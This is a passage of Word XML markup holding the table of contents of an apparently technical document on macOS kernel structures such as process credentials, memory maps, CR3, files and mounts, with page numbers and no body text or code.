                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313241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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Memory map</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313242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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.6.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Process name</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313243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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.7.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CR3</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313244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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.8.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Opened files</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313245 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6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46" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.9.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network connection socket</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313246 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</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47" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.10.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>setuid</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313247 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</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48" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.11.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>kauth_cred_setuidgid (Get root)</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313248 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</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49" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.12.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>setreuid</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313249 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7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50" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313250 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</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51" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Memory map</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313251 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vm map</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313252 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>map names</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313253 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>map start/end</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313254 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>109</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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>perms</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313255 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>109</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56" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Files</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313256 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>109</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7" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>file descriptor</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313257 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11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58" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>file path</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313258 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</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59" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mount</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313259 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</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0" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vfsstatfs</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313260 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
